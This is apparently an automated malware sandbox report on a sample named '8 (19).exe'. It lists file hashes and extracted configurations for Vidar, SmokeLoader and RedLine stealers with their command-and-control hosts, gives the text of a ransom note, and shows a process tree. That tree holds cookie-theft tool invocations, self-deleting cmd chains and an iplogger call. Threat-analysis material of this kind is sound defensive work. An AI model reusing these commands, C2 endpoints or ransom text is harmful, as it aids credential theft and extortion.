Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    1803s
  • max time network
    1820s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    20-07-2021 12:41

General

  • Target

    8 (19).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Path

C:\_readme.txt

Ransom Note
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-N3p42CffoV Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: manager@mailtemp.ch Reserve e-mail address to contact us: managerhelper@airmail.cc Your personal ID: 0318ewgfDdCatwRkqdYh2Jomn6DqwFoGgcSbDsle1xlE1NPtt1
Emails

manager@mailtemp.ch

managerhelper@airmail.cc

URLs

https://we.tl/t-N3p42CffoV

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

2007

C2

37.1.219.52:6534

Extracted

Family

redline

Botnet

sel17

C2

dwarimlari.xyz:80

Extracted

Family

redline

Botnet

AniNEW

C2

akedauiver.xyz:80

Extracted

Family

vidar

Version

39.7

Botnet

921

C2

https://shpak125.tumblr.com/

Attributes
  • profile_id

    921

Extracted

Family

vidar

Version

39.6

Botnet

903

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    903

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 8 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • redlinestealer 9 IoCs

    RedlineStealer.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 6 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • Modifies extensions of user files 9 IoCs

    Ransomware generally changes the extension on encrypted files.

  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 24 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 18 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 19 IoCs
  • Drops file in Program Files directory 7 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 21 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 16 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 6 IoCs
  • Kills process with taskkill 6 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs .reg file with regedit 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
      PID:2864
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2644
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
          PID:2616
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2472
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
            1⤵
              PID:2456
            • C:\Users\Admin\AppData\Local\Temp\8 (19).exe
              "C:\Users\Admin\AppData\Local\Temp\8 (19).exe"
              1⤵
              • Suspicious use of WriteProcessMemory
              PID:4048
              • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:2632
                • C:\Users\Admin\AppData\Local\Temp\7zS84AAC344\setup_install.exe
                  "C:\Users\Admin\AppData\Local\Temp\7zS84AAC344\setup_install.exe"
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:2960
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c sonia_1.exe
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2652
                    • C:\Users\Admin\AppData\Local\Temp\7zS84AAC344\sonia_1.exe
                      sonia_1.exe
                      5⤵
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:3824
                      • C:\Users\Admin\AppData\Local\Temp\7zS84AAC344\sonia_1.exe
                        "C:\Users\Admin\AppData\Local\Temp\7zS84AAC344\sonia_1.exe" -a
                        6⤵
                        • Executes dropped EXE
                        PID:2032
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c sonia_2.exe
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3676
                    • C:\Users\Admin\AppData\Local\Temp\7zS84AAC344\sonia_2.exe
                      sonia_2.exe
                      5⤵
                        PID:3912
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c sonia_4.exe
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1312
                      • C:\Users\Admin\AppData\Local\Temp\7zS84AAC344\sonia_4.exe
                        sonia_4.exe
                        5⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:1684
                        • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                          "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:4120
                          • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                            "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                            7⤵
                            • Executes dropped EXE
                            PID:4740
                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                              8⤵
                                PID:924
                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                8⤵
                                • Executes dropped EXE
                                PID:4444
                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                8⤵
                                  PID:812
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  8⤵
                                    PID:2528
                                • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                  "C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  PID:4988
                                  • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                    C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                    8⤵
                                    • Executes dropped EXE
                                    PID:2200
                                  • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                    C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                    8⤵
                                    • Executes dropped EXE
                                    PID:5080
                                • C:\Users\Admin\AppData\Local\Temp\setup 326.exe
                                  "C:\Users\Admin\AppData\Local\Temp\setup 326.exe"
                                  7⤵
                                    PID:4132
                                    • C:\Windows\winnetdriv.exe
                                      "C:\Users\Admin\AppData\Local\Temp\setup 326.exe" 1626785564 0
                                      8⤵
                                      • Executes dropped EXE
                                      PID:4540
                                  • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                    "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    PID:4252
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 804
                                      8⤵
                                      • Program crash
                                      PID:2676
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 840
                                      8⤵
                                      • Program crash
                                      PID:1268
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 896
                                      8⤵
                                      • Program crash
                                      PID:4384
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 992
                                      8⤵
                                      • Program crash
                                      PID:2496
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 904
                                      8⤵
                                      • Program crash
                                      PID:2964
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 1088
                                      8⤵
                                      • Program crash
                                      PID:2204
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 864
                                      8⤵
                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                      • Program crash
                                      PID:4512
                                  • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                                    "C:\Users\Admin\AppData\Local\Temp\zhangd.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    PID:1112
                                    • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                                      "C:\Users\Admin\AppData\Local\Temp\zhangd.exe" -a
                                      8⤵
                                      • Executes dropped EXE
                                      PID:1300
                                  • C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe
                                    "C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    PID:4752
                                    • C:\Windows\system32\WerFault.exe
                                      C:\Windows\system32\WerFault.exe -u -p 4752 -s 1004
                                      8⤵
                                      • Program crash
                                      PID:5000
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c sonia_6.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3928
                              • C:\Users\Admin\AppData\Local\Temp\7zS84AAC344\sonia_6.exe
                                sonia_6.exe
                                5⤵
                                • Executes dropped EXE
                                • Adds Run key to start application
                                • Suspicious use of WriteProcessMemory
                                PID:1696
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  6⤵
                                  • Executes dropped EXE
                                  PID:1876
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  6⤵
                                    PID:4444
                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    6⤵
                                      PID:4380
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      6⤵
                                        PID:408
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c sonia_7.exe
                                    4⤵
                                      PID:3708
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c sonia_5.exe
                                      4⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:2116
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c sonia_3.exe
                                      4⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:1328
                              • c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                1⤵
                                  PID:1852
                                • c:\windows\system32\svchost.exe
                                  c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                  1⤵
                                    PID:1352
                                  • c:\windows\system32\svchost.exe
                                    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                    1⤵
                                      PID:1276
                                    • c:\windows\system32\svchost.exe
                                      c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                      1⤵
                                        PID:1228
                                      • c:\windows\system32\svchost.exe
                                        c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                        1⤵
                                          PID:1104
                                        • c:\windows\system32\svchost.exe
                                          c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                          1⤵
                                          • Drops file in System32 directory
                                          PID:928
                                          • C:\Users\Admin\AppData\Local\9bc85cbe-4706-4078-aa06-29236e962088\175C.exe
                                            C:\Users\Admin\AppData\Local\9bc85cbe-4706-4078-aa06-29236e962088\175C.exe --Task
                                            2⤵
                                            • Suspicious use of SetThreadContext
                                            PID:6752
                                            • C:\Users\Admin\AppData\Local\9bc85cbe-4706-4078-aa06-29236e962088\175C.exe
                                              C:\Users\Admin\AppData\Local\9bc85cbe-4706-4078-aa06-29236e962088\175C.exe --Task
                                              3⤵
                                                PID:6792
                                            • C:\Users\Admin\AppData\Roaming\ccdgstu
                                              C:\Users\Admin\AppData\Roaming\ccdgstu
                                              2⤵
                                              • Loads dropped DLL
                                              • Checks SCSI registry key(s)
                                              • Suspicious behavior: MapViewOfSection
                                              PID:628
                                            • C:\Users\Admin\AppData\Local\9bc85cbe-4706-4078-aa06-29236e962088\175C.exe
                                              C:\Users\Admin\AppData\Local\9bc85cbe-4706-4078-aa06-29236e962088\175C.exe --Task
                                              2⤵
                                              • Suspicious use of SetThreadContext
                                              PID:7064
                                              • C:\Users\Admin\AppData\Local\9bc85cbe-4706-4078-aa06-29236e962088\175C.exe
                                                C:\Users\Admin\AppData\Local\9bc85cbe-4706-4078-aa06-29236e962088\175C.exe --Task
                                                3⤵
                                                  PID:7144
                                              • C:\Users\Admin\AppData\Local\9bc85cbe-4706-4078-aa06-29236e962088\175C.exe
                                                C:\Users\Admin\AppData\Local\9bc85cbe-4706-4078-aa06-29236e962088\175C.exe --Task
                                                2⤵
                                                • Suspicious use of SetThreadContext
                                                PID:4572
                                                • C:\Users\Admin\AppData\Local\9bc85cbe-4706-4078-aa06-29236e962088\175C.exe
                                                  C:\Users\Admin\AppData\Local\9bc85cbe-4706-4078-aa06-29236e962088\175C.exe --Task
                                                  3⤵
                                                    PID:5708
                                                • C:\Users\Admin\AppData\Local\9bc85cbe-4706-4078-aa06-29236e962088\175C.exe
                                                  C:\Users\Admin\AppData\Local\9bc85cbe-4706-4078-aa06-29236e962088\175C.exe --Task
                                                  2⤵
                                                  • Suspicious use of SetThreadContext
                                                  PID:5564
                                                  • C:\Users\Admin\AppData\Local\9bc85cbe-4706-4078-aa06-29236e962088\175C.exe
                                                    C:\Users\Admin\AppData\Local\9bc85cbe-4706-4078-aa06-29236e962088\175C.exe --Task
                                                    3⤵
                                                      PID:6156
                                                  • C:\Users\Admin\AppData\Roaming\ccdgstu
                                                    C:\Users\Admin\AppData\Roaming\ccdgstu
                                                    2⤵
                                                    • Loads dropped DLL
                                                    • Checks SCSI registry key(s)
                                                    • Suspicious behavior: MapViewOfSection
                                                    PID:6228
                                                  • C:\Users\Admin\AppData\Local\9bc85cbe-4706-4078-aa06-29236e962088\175C.exe
                                                    C:\Users\Admin\AppData\Local\9bc85cbe-4706-4078-aa06-29236e962088\175C.exe --Task
                                                    2⤵
                                                    • Suspicious use of SetThreadContext
                                                    PID:5336
                                                    • C:\Users\Admin\AppData\Local\9bc85cbe-4706-4078-aa06-29236e962088\175C.exe
                                                      C:\Users\Admin\AppData\Local\9bc85cbe-4706-4078-aa06-29236e962088\175C.exe --Task
                                                      3⤵
                                                        PID:5676
                                                    • C:\Users\Admin\AppData\Local\9bc85cbe-4706-4078-aa06-29236e962088\175C.exe
                                                      C:\Users\Admin\AppData\Local\9bc85cbe-4706-4078-aa06-29236e962088\175C.exe --Task
                                                      2⤵
                                                      • Suspicious use of SetThreadContext
                                                      PID:4600
                                                      • C:\Users\Admin\AppData\Local\9bc85cbe-4706-4078-aa06-29236e962088\175C.exe
                                                        C:\Users\Admin\AppData\Local\9bc85cbe-4706-4078-aa06-29236e962088\175C.exe --Task
                                                        3⤵
                                                          PID:5400
                                                      • C:\Users\Admin\AppData\Roaming\ccdgstu
                                                        C:\Users\Admin\AppData\Roaming\ccdgstu
                                                        2⤵
                                                        • Loads dropped DLL
                                                        • Checks SCSI registry key(s)
                                                        • Suspicious behavior: MapViewOfSection
                                                        PID:6604
                                                    • c:\windows\system32\svchost.exe
                                                      c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                      1⤵
                                                        PID:352
                                                      • \??\c:\windows\system32\svchost.exe
                                                        c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                        1⤵
                                                        • Suspicious use of SetThreadContext
                                                        • Modifies registry class
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:784
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                          2⤵
                                                          • Drops file in System32 directory
                                                          • Checks processor information in registry
                                                          • Modifies data under HKEY_USERS
                                                          • Modifies registry class
                                                          PID:3256
                                                      • C:\Users\Admin\AppData\Local\Temp\7zS84AAC344\sonia_3.exe
                                                        sonia_3.exe
                                                        1⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Checks processor information in registry
                                                        • Modifies system certificate store
                                                        PID:3820
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im sonia_3.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS84AAC344\sonia_3.exe" & del C:\ProgramData\*.dll & exit
                                                          2⤵
                                                            PID:1952
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill /im sonia_3.exe /f
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Kills process with taskkill
                                                              PID:4452
                                                            • C:\Windows\SysWOW64\timeout.exe
                                                              timeout /t 6
                                                              3⤵
                                                              • Delays execution with timeout.exe
                                                              PID:5828
                                                        • C:\Users\Admin\AppData\Local\Temp\7zS84AAC344\sonia_5.exe
                                                          sonia_5.exe
                                                          1⤵
                                                          • Executes dropped EXE
                                                          • Checks computer location settings
                                                          PID:1664
                                                          • C:\Users\Admin\Documents\eut7Trdt8gguIhwoCgb65yFu.exe
                                                            "C:\Users\Admin\Documents\eut7Trdt8gguIhwoCgb65yFu.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4676
                                                            • C:\Users\Admin\Documents\eut7Trdt8gguIhwoCgb65yFu.exe
                                                              C:\Users\Admin\Documents\eut7Trdt8gguIhwoCgb65yFu.exe
                                                              3⤵
                                                                PID:4136
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im eut7Trdt8gguIhwoCgb65yFu.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\eut7Trdt8gguIhwoCgb65yFu.exe" & del C:\ProgramData\*.dll & exit
                                                                  4⤵
                                                                  • Executes dropped EXE
                                                                  PID:5448
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill /im eut7Trdt8gguIhwoCgb65yFu.exe /f
                                                                    5⤵
                                                                    • Kills process with taskkill
                                                                    PID:512
                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                    timeout /t 6
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    • Checks processor information in registry
                                                                    • Delays execution with timeout.exe
                                                                    PID:4136
                                                            • C:\Users\Admin\Documents\3eC0tolUaMWKjjIuDlMh0Za6.exe
                                                              "C:\Users\Admin\Documents\3eC0tolUaMWKjjIuDlMh0Za6.exe"
                                                              2⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4668
                                                            • C:\Users\Admin\Documents\gQNsOHzGzV0PdmpZLuxHbn5I.exe
                                                              "C:\Users\Admin\Documents\gQNsOHzGzV0PdmpZLuxHbn5I.exe"
                                                              2⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetThreadContext
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4728
                                                              • C:\Users\Admin\Documents\gQNsOHzGzV0PdmpZLuxHbn5I.exe
                                                                C:\Users\Admin\Documents\gQNsOHzGzV0PdmpZLuxHbn5I.exe
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Checks processor information in registry
                                                                PID:2540
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im gQNsOHzGzV0PdmpZLuxHbn5I.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\gQNsOHzGzV0PdmpZLuxHbn5I.exe" & del C:\ProgramData\*.dll & exit
                                                                  4⤵
                                                                    PID:5776
                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                      taskkill /im gQNsOHzGzV0PdmpZLuxHbn5I.exe /f
                                                                      5⤵
                                                                      • Kills process with taskkill
                                                                      PID:4192
                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                      timeout /t 6
                                                                      5⤵
                                                                      • Delays execution with timeout.exe
                                                                      PID:4228
                                                              • C:\Users\Admin\Documents\6MGgLwDOKzyIcIah9Y6NBCtH.exe
                                                                "C:\Users\Admin\Documents\6MGgLwDOKzyIcIah9Y6NBCtH.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                PID:4808
                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  3⤵
                                                                    PID:2496
                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    3⤵
                                                                      PID:5496
                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      3⤵
                                                                        PID:5240
                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                        3⤵
                                                                          PID:5276
                                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                          3⤵
                                                                            PID:4164
                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            3⤵
                                                                              PID:5772
                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              3⤵
                                                                                PID:1472
                                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                3⤵
                                                                                  PID:5620
                                                                              • C:\Users\Admin\Documents\0xT0OQyQnPsiMP1PyXPDqSap.exe
                                                                                "C:\Users\Admin\Documents\0xT0OQyQnPsiMP1PyXPDqSap.exe"
                                                                                2⤵
                                                                                  PID:4800
                                                                                  • C:\Users\Admin\Documents\0xT0OQyQnPsiMP1PyXPDqSap.exe
                                                                                    C:\Users\Admin\Documents\0xT0OQyQnPsiMP1PyXPDqSap.exe
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:2688
                                                                                • C:\Users\Admin\Documents\buQaBmq0EYASqXtrdmE6snCB.exe
                                                                                  "C:\Users\Admin\Documents\buQaBmq0EYASqXtrdmE6snCB.exe"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  • Drops file in Program Files directory
                                                                                  PID:4324
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\EverestSoftrade\TonerRecover\log.bat" "
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:4800
                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                      explorer https://iplogger.org/2LBCU6
                                                                                      4⤵
                                                                                        PID:4196
                                                                                      • C:\Windows\SysWOW64\regedit.exe
                                                                                        regedit /s adj.reg
                                                                                        4⤵
                                                                                        • Runs .reg file with regedit
